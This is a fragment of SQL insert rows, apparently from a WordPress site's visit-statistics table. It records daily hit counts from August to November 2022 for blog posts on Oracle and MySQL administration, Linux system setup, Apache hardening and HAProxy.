(3037,'/','home','2022-08-27',35,365),
(3038,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-08-27',1,27),
(3039,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-08-27',1,150),
(3040,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-08-27',1,312),
(3041,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-08-27',1,104),
(3042,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-27',1,583),
(3043,'/about-me/','page','2022-08-27',2,51),
(3044,'/how-to-make-apache-web-server-more-secure/','post','2022-08-27',1,305),
(3045,'/hosting-a-podcast/','post','2022-08-27',1,329),
(3046,'/fedora-33-problem-with-broadcom-wifi-device/feed/','feed','2022-08-27',1,312),
(3047,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2022-08-27',1,104),
(3048,'/one-way-to-prevent-ddos-attacks-in-wordpress/feed/','feed','2022-08-27',1,150),
(3049,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/feed/','feed','2022-08-27',1,27),
(3050,'/how-to-make-apache-web-server-more-secure/feed/','feed','2022-08-27',1,305),
(3051,'/connection-encryption-in-oracle-database/','post','2022-08-27',1,110),
(3052,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-08-27',1,97),
(3053,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-08-27',1,60),
(3054,'/backup-restore-progress/','post','2022-08-27',1,64),
(3055,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-08-27',1,66),
(3056,'/change-the-character-set-collation-of-a-table/','post','2022-08-27',1,68),
(3057,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2022-08-27',1,583),
(3058,'/impdp-errors-ora-02374-ora-12899','post','2022-08-28',11,56),
(3059,'/','home','2022-08-28',25,365),
(3060,'/add-new-disk-to-redhat-based-linux-without-reboot/feed/','feed','2022-08-28',1,97),
(3061,'/connection-encryption-in-oracle-database/feed/','feed','2022-08-28',1,110),
(3062,'/backup-restore-progress/feed/','feed','2022-08-28',1,64),
(3063,'/database-startup-error-fatal-ni-connect-error-12547/feed/','feed','2022-08-28',1,60),
(3064,'/rebuild-and-reorganize-all-indexes-within-a-database/feed/','feed','2022-08-28',1,66),
(3065,'/hosting-a-podcast/feed/','feed','2022-08-28',1,329),
(3066,'/change-the-character-set-collation-of-a-table/','post','2022-08-28',2,68),
(3067,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-08-28',1,56),
(3068,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-08-28',2,97),
(3069,'/fedora-33-problem-with-broadcom-wifi-device/feed/','feed','2022-08-28',1,312),
(3070,'/how-to-make-apache-web-server-more-secure/','post','2022-08-28',2,305),
(3071,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-08-28',1,104),
(3072,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2022-08-28',1,104),
(3073,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-08-28',1,150),
(3074,'/sudo-without-password/','post','2022-08-28',1,603),
(3075,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-28',1,583),
(3076,'/?p=110','post','2022-08-28',2,110),
(3077,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-08-28',1,312),
(3078,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2022-08-28',1,583),
(3079,'/hosting-a-podcast/','post','2022-08-28',1,329),
(3080,'/','home','2022-08-29',25,365),
(3081,'/about-me/','page','2022-08-29',4,51),
(3082,'/change-the-character-set-collation-of-a-table/feed/','feed','2022-08-29',1,68),
(3083,'/impdp-errors-ora-02374-ora-12899','post','2022-08-29',10,56),
(3084,'/','home','2022-08-30',50,365),
(3085,'/about-me/','page','2022-08-30',2,51),
(3086,'/impdp-errors-ora-02374-ora-12899','post','2022-08-30',9,56),
(3087,'/impdp-errors-ora-02374-ora-12899','post','2022-08-31',9,56),
(3088,'/','home','2022-08-31',15,365),
(3089,'/about-me/','page','2022-08-31',1,51),
(3090,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-31',1,583),
(3091,'/impdp-errors-ora-02374-ora-12899','post','2022-09-01',10,56),
(3092,'/','home','2022-09-01',20,365),
(3093,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-01',2,583),
(3094,'/','home','2022-09-02',39,365),
(3095,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-02',14,56),
(3096,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-03',1,583),
(3097,'/','home','2022-09-03',31,365),
(3098,'/impdp-errors-ora-02374-ora-12899','post','2022-09-03',9,56),
(3099,'/hosting-a-podcast/','post','2022-09-03',1,329),
(3100,'/about-me/','page','2022-09-03',1,51),
(3101,'/','home','2022-09-04',24,365),
(3102,'/impdp-errors-ora-02374-ora-12899','post','2022-09-04',9,56),
(3103,'/about-me/','page','2022-09-04',1,51),
(3104,'/hosting-a-podcast/','post','2022-09-04',1,329),
(3105,'/impdp-errors-ora-02374-ora-12899','post','2022-09-05',10,56),
(3106,'/','home','2022-09-05',14,365),
(3107,'/about-me/','page','2022-09-05',1,51),
(3108,'/','home','2022-09-06',38,365),
(3109,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-06',12,56),
(3110,'/connection-encryption-in-oracle-database/','post','2022-09-06',1,110),
(3111,'/','home','2022-09-07',26,365),
(3112,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-07',9,56),
(3113,'/','home','2022-09-08',42,365),
(3114,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-08',10,56),
(3115,'/impdp-errors-ora-02374-ora-12899','post','2022-09-09',12,56),
(3116,'/','home','2022-09-09',40,365),
(3117,'/about-me/','page','2022-09-09',2,51),
(3118,'/','home','2022-09-10',47,365),
(3119,'/about-me/','page','2022-09-10',2,51),
(3120,'/impdp-errors-ora-02374-ora-12899','post','2022-09-10',10,56),
(3121,'/impdp-errors-ora-02374-ora-12899','post','2022-09-11',11,56),
(3122,'/','home','2022-09-11',33,365),
(3123,'/sudo-without-password/','post','2022-09-11',1,603),
(3124,'/about-me/','page','2022-09-11',1,51),
(3125,'/impdp-errors-ora-02374-ora-12899','post','2022-09-12',7,56),
(3126,'/sudo-without-password/feed/','feed','2022-09-12',1,603),
(3127,'/','home','2022-09-12',42,365),
(3128,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-12',1,583),
(3129,'/about-me/','page','2022-09-12',2,51),
(3130,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-13',12,56),
(3131,'/','home','2022-09-13',37,365),
(3132,'/','home','2022-09-14',46,365),
(3133,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-14',11,56),
(3134,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-14',1,583),
(3135,'/','home','2022-09-15',30,365),
(3136,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-15',10,56),
(3137,'/','home','2022-09-16',38,365),
(3138,'/impdp-errors-ora-02374-ora-12899','post','2022-09-16',9,56),
(3139,'/about-me/','page','2022-09-16',4,51),
(3140,'/connection-encryption-in-oracle-database/','post','2022-09-16',1,110),
(3141,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-09-16',1,97),
(3142,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-17',12,56),
(3143,'/','home','2022-09-17',29,365),
(3144,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-18',9,56),
(3145,'/about-me/','page','2022-09-18',1,51),
(3146,'/','home','2022-09-18',8,365),
(3147,'/','home','2022-09-19',29,365),
(3148,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-19',9,56),
(3149,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-09-19',1,66),
(3150,'/about-me/','page','2022-09-19',1,51),
(3151,'/','home','2022-09-20',38,365),
(3152,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-20',7,56),
(3153,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-09-20',1,60),
(3154,'/about-me/','page','2022-09-20',2,51),
(3155,'/','home','2022-09-21',30,365),
(3156,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-21',8,56),
(3157,'/','home','2022-09-22',49,365),
(3158,'/about-me/','page','2022-09-22',1,51),
(3159,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-22',9,56),
(3160,'/','home','2022-09-23',20,365),
(3161,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-23',5,56),
(3162,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-24',10,56),
(3163,'/','home','2022-09-24',34,365),
(3164,'/change-the-character-set-collation-of-a-table/','post','2022-09-24',4,68),
(3165,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-09-24',1,56),
(3166,'/sudo-without-password/','post','2022-09-24',3,603),
(3167,'/connection-encryption-in-oracle-database/feed/','feed','2022-09-24',1,110),
(3168,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-24',3,583),
(3169,'/?p=97','post','2022-09-24',4,97),
(3170,'/hosting-a-podcast/','post','2022-09-24',3,329),
(3171,'/hosting-a-podcast/feed/','feed','2022-09-24',1,329),
(3172,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-09-24',3,312),
(3173,'/?p=104','post','2022-09-24',4,104),
(3174,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-09-24',3,150),
(3175,'/add-new-disk-to-redhat-based-linux-without-reboot/feed/','feed','2022-09-24',1,97),
(3176,'/sudo-without-password/feed/','feed','2022-09-24',1,603),
(3177,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2022-09-24',1,583),
(3178,'/how-to-make-apache-web-server-more-secure/','post','2022-09-24',2,305),
(3179,'/about-me/','page','2022-09-24',2,51),
(3180,'/one-way-to-prevent-ddos-attacks-in-wordpress/feed/','feed','2022-09-24',1,150),
(3181,'/connection-encryption-in-oracle-database/','post','2022-09-24',3,110),
(3182,'/how-to-make-apache-web-server-more-secure/feed/','feed','2022-09-24',1,305),
(3183,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-25',9,56),
(3184,'/','home','2022-09-25',34,365),
(3185,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2022-09-25',1,104),
(3186,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-25',1,583),
(3187,'/change-the-character-set-collation-of-a-table/','post','2022-09-25',1,68),
(3188,'/connection-encryption-in-oracle-database/','post','2022-09-25',1,110),
(3189,'/sudo-without-password/','post','2022-09-25',3,603),
(3190,'/about-me/','page','2022-09-25',2,51),
(3191,'/change-the-character-set-collation-of-a-table/feed/','feed','2022-09-25',2,68),
(3192,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-09-25',2,312),
(3193,'/?p=150','post','2022-09-25',3,150),
(3194,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-09-25',1,97),
(3195,'/connection-encryption-in-oracle-database/','post','2022-09-26',2,110),
(3196,'/hosting-a-podcast/feed/','feed','2022-09-26',1,329),
(3197,'/sudo-without-password/feed/','feed','2022-09-26',1,603),
(3198,'/change-the-character-set-collation-of-a-table/','post','2022-09-26',4,68),
(3199,'/how-to-make-apache-web-server-more-secure/feed/','feed','2022-09-26',1,305),
(3200,'/hosting-a-podcast/','post','2022-09-26',4,329),
(3201,'/?p=583','post','2022-09-26',4,583),
(3202,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-26',7,56),
(3203,'/','home','2022-09-26',40,365),
(3204,'/one-way-to-prevent-ddos-attacks-in-wordpress/feed/','feed','2022-09-26',2,150),
(3205,'/how-to-make-apache-web-server-more-secure/','post','2022-09-26',4,305),
(3206,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-09-26',2,97),
(3207,'/connection-encryption-in-oracle-database/feed/','feed','2022-09-26',1,110),
(3208,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-09-26',2,104),
(3209,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2022-09-26',1,104),
(3210,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-09-26',3,312),
(3211,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2022-09-26',1,583),
(3212,'/sudo-without-password/','post','2022-09-26',1,603),
(3213,'/','home','2022-09-27',46,365),
(3214,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-27',8,56),
(3215,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-09-27',1,27),
(3216,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-09-27',1,150),
(3217,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-09-27',1,312),
(3218,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-09-27',1,104),
(3219,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-09-28',2,27),
(3220,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-09-28',2,150),
(3221,'/','home','2022-09-28',50,365),
(3222,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-09-28',2,312),
(3223,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-09-28',2,104),
(3224,'/backup-restore-progress/','post','2022-09-28',2,64),
(3225,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-09-28',2,66),
(3226,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-28',10,56),
(3227,'/change-the-character-set-collation-of-a-table/','post','2022-09-28',2,68),
(3228,'/about-me/','page','2022-09-28',2,51),
(3229,'/how-to-make-apache-web-server-more-secure/','post','2022-09-28',1,305),
(3230,'/connection-encryption-in-oracle-database/','post','2022-09-28',1,110),
(3231,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-09-28',1,97),
(3232,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-09-28',1,60),
(3233,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-28',2,583),
(3234,'/hosting-a-podcast/','post','2022-09-28',1,329),
(3235,'/','home','2022-09-29',34,365),
(3236,'/about-me/','page','2022-09-29',1,51),
(3237,'/impdp-errors-ora-02374-ora-12899','post','2022-09-29',8,56),
(3238,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-29',6,583),
(3239,'/','home','2022-09-30',23,365),
(3240,'/impdp-errors-ora-02374-ora-12899/','post','2022-09-30',8,56),
(3241,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-09-30',1,583),
(3242,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-10-01',1,27),
(3243,'/','home','2022-10-01',29,365),
(3244,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-10-01',1,150),
(3245,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-10-01',1,312),
(3246,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-10-01',1,104),
(3247,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-10-01',1,60),
(3248,'/backup-restore-progress/','post','2022-10-01',1,64),
(3249,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-10-01',1,66),
(3250,'/hosting-a-podcast/','post','2022-10-01',1,329),
(3251,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-01',7,56),
(3252,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-10-01',1,583),
(3253,'/','home','2022-10-02',25,365),
(3254,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-02',10,56),
(3255,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-10-02',2,583),
(3256,'/','home','2022-10-03',19,365),
(3257,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-03',8,56),
(3258,'/','home','2022-10-04',20,365),
(3259,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-04',6,56),
(3260,'/add-new-disk-to-redhat-based-linux-without-reboot','post','2022-10-04',2,97),
(3261,'/','home','2022-10-05',31,365),
(3262,'/about-me/','page','2022-10-05',1,51),
(3263,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-05',9,56),
(3264,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-06',54,56),
(3265,'/','home','2022-10-06',31,365),
(3266,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-07',11,56),
(3267,'/','home','2022-10-07',29,365),
(3268,'/about-me/','page','2022-10-07',1,51),
(3269,'/','home','2022-10-08',25,365),
(3270,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-08',10,56),
(3271,'/','home','2022-10-09',8,365),
(3272,'/connection-encryption-in-oracle-database/','post','2022-10-09',1,110),
(3273,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-09',1,56),
(3274,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-10-10',1,583),
(3275,'/','home','2022-10-10',9,365),
(3276,'/about-me/','page','2022-10-10',1,51),
(3277,'/','home','2022-10-11',24,365),
(3278,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-11',5,56),
(3279,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-10-11',1,583),
(3280,'/about-me/','page','2022-10-11',1,51),
(3281,'/','home','2022-10-12',30,365),
(3282,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-12',12,56),
(3283,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-10-12',1,27),
(3284,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-10-12',2,583),
(3285,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-13',7,56),
(3286,'/','home','2022-10-13',34,365),
(3287,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-14',8,56),
(3288,'/','home','2022-10-14',27,365),
(3289,'/about-me/','page','2022-10-14',2,51),
(3290,'/','home','2022-10-15',51,365),
(3291,'/impdp-errors-ora-02374-ora-12899','post','2022-10-15',5,56),
(3292,'/','home','2022-10-16',29,365),
(3293,'/impdp-errors-ora-02374-ora-12899','post','2022-10-16',13,56),
(3294,'/about-me/','page','2022-10-16',1,51),
(3295,'/','home','2022-10-17',39,365),
(3296,'/about-me/','page','2022-10-17',3,51),
(3297,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-17',4,56),
(3298,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-10-17',1,583),
(3299,'/','home','2022-10-18',38,365),
(3300,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-18',7,56),
(3301,'/about-me/','page','2022-10-18',1,51),
(3302,'/','home','2022-10-19',62,365),
(3303,'/about-me/','page','2022-10-19',8,51),
(3304,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-19',4,56),
(3305,'/','home','2022-10-20',22,365),
(3306,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-20',5,56),
(3307,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-10-20',5,583),
(3308,'/','home','2022-10-21',37,365),
(3309,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-21',4,56),
(3310,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-10-21',3,583),
(3311,'/about-me/','page','2022-10-21',2,51),
(3312,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-10-21',1,312),
(3313,'/','home','2022-10-22',27,365),
(3314,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-22',6,56),
(3315,'/hosting-a-podcast/','post','2022-10-22',1,329),
(3316,'/about-me/','page','2022-10-22',1,51),
(3317,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-10-22',1,104),
(3318,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-10-22',1,97),
(3319,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-10-22',1,312),
(3320,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-10-22',1,66),
(3321,'/impdp-errors-ora-02374-ora-12899/','post','2022-10-31',4,56),
(3322,'/','home','2022-10-31',26,365),
(3323,'/about-me/','page','2022-10-31',1,51),
(3324,'/','home','2022-11-01',62,365),
(3325,'/about-me/','page','2022-11-01',2,51),
(3326,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-01',2,56),
(3327,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-02',4,56),
(3328,'/','home','2022-11-02',39,365),
(3329,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-11-02',1,66),
(3330,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-03',4,56),
(3331,'/','home','2022-11-03',29,365),
(3332,'/','home','2022-11-04',28,365),
(3333,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-04',4,56),
(3334,'/','home','2022-11-05',32,365),
(3335,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-11-05',2,583),
(3336,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-05',4,56),
(3337,'/about-me/','page','2022-11-05',1,51),
(3338,'/','home','2022-11-06',38,365),
(3339,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-06',4,56),
(3340,'/about-me/','page','2022-11-06',1,51),
(3341,'/','home','2022-11-07',44,365),
(3342,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-07',4,56),
(3343,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-08',4,56),
(3344,'/','home','2022-11-08',51,365),
(3345,'/about-me','page','2022-11-08',3,51),
(3346,'/index.php/checkout/','page','2022-11-08',2,321),
(3347,'/cart/','page','2022-11-08',3,320),
(3348,'/index.php/my-account/','page','2022-11-08',2,322),
(3349,'/fedora-33-problem-with-broadcom-wifi-device/feed/','feed','2022-11-08',1,312),
(3350,'/hosting-a-podcast/feed/','feed','2022-11-08',1,329),
(3351,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-09',6,56),
(3352,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-11-09',1,104),
(3353,'/','home','2022-11-09',36,365),
(3354,'/about-me/','page','2022-11-09',1,51),
(3355,'/','home','2022-11-10',81,365),
(3356,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-11-10',3,60),
(3357,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-10',3,56),
(3358,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-11-10',1,583),
(3359,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-11',6,56),
(3360,'/','home','2022-11-11',39,365),
(3361,'/','home','2022-11-12',39,365),
(3362,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-12',4,56),
(3363,'/about-me/','page','2022-11-12',2,51),
(3364,'/','home','2022-11-13',25,365),
(3365,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-13',4,56),
(3366,'/','home','2022-11-14',38,365),
(3367,'/about-me/','page','2022-11-14',2,51),
(3368,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-14',7,56),
(3369,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-11-14',1,312),
(3370,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-11-14',1,97),
(3371,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-11-14',1,104),
(3372,'/how-to-make-apache-web-server-more-secure/','post','2022-11-14',1,305),
(3373,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-11-14',1,150),
(3374,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-11-14',1,583),
(3375,'/backup-restore-progress/','post','2022-11-14',1,64),
(3376,'/connection-encryption-in-oracle-database/','post','2022-11-14',1,110),
(3377,'/sudo-without-password/','post','2022-11-14',1,603),
(3378,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-11-14',2,60),
(3379,'/change-the-character-set-collation-of-a-table/','post','2022-11-14',1,68),
(3380,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-11-14',1,66),
(3381,'/','home','2022-11-15',39,365),
(3382,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-15',6,56),
(3383,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-11-15',1,104),
(3384,'/about-me/','page','2022-11-15',1,51),
(3385,'/','home','2022-11-16',25,365),
(3386,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-16',4,56),
(3387,'/about-me/','page','2022-11-16',1,51),
(3388,'/','home','2022-11-17',28,365),
(3389,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-17',5,56),
(3390,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-11-17',1,104),
(3391,'/','home','2022-11-18',62,365),
(3392,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-18',3,56),
(3393,'/about-me/','page','2022-11-18',1,51),
(3394,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-11-18',1,104),
(3395,'/','home','2022-11-19',32,365),
(3396,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-19',4,56),
(3397,'/','home','2022-11-20',38,365),
(3398,'/about-me/','page','2022-11-20',1,51),
(3399,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-20',4,56),
(3400,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-11-20',1,104),
(3401,'/sudo-without-password/','post','2022-11-20',1,603),
(3402,'/how-to-make-apache-web-server-more-secure/','post','2022-11-20',1,305),
(3403,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-11-20',1,312),
(3404,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-11-20',1,97),
(3405,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-21',5,56),
(3406,'/','home','2022-11-21',27,365),
(3407,'/about-me/','page','2022-11-21',1,51),
(3408,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-11-21',1,583),
(3409,'/','home','2022-11-22',38,365),
(3410,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-22',6,56),
(3411,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-11-22',2,104),
(3412,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-11-22',1,312),
(3413,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-11-22',5,583),
(3414,'/about-me/','page','2022-11-22',1,51),
(3415,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-23',6,56),
(3416,'/','home','2022-11-23',37,365),
(3417,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-11-23',4,583),
(3418,'/','home','2022-11-24',37,365),
(3419,'/about-me/','page','2022-11-24',2,51),
(3420,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-24',4,56),
(3421,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-25',5,56),
(3422,'/','home','2022-11-25',45,365),
(3423,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-11-25',5,583),
(3424,'/sudo-without-password/','post','2022-11-25',1,603),
(3425,'/about-me/','page','2022-11-25',2,51),
(3426,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-11-25',1,60),
(3427,'/connection-encryption-in-oracle-database/','post','2022-11-25',1,110),
(3428,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-26',5,56),
(3429,'/','home','2022-11-26',52,365),
(3430,'/','home','2022-11-27',68,365),
(3431,'/about-me/','page','2022-11-27',5,51),
(3432,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-27',6,56),
(3433,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-11-27',1,60),
(3434,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-11-27',1,583),
(3435,'/connection-encryption-in-oracle-database/','post','2022-11-27',1,110),
(3436,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-11-27',1,312),
(3437,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-11-27',1,97),
(3438,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-11-27',1,56),
(3439,'/connection-encryption-in-oracle-database/','post','2022-11-28',2,110),
(3440,'/','home','2022-11-28',53,365),
(3441,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-28',7,56),
(3442,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-11-28',1,60),
(3443,'/about-me/','page','2022-11-28',1,51),
(3444,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-29',4,56),
(3445,'/','home','2022-11-29',53,365),
(3446,'/sudo-without-password/','post','2022-11-29',1,603),
(3447,'/about-me/','page','2022-11-29',1,51),
(3448,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2022-11-29',1,104),
(3449,'/','home','2022-11-30',25,365),
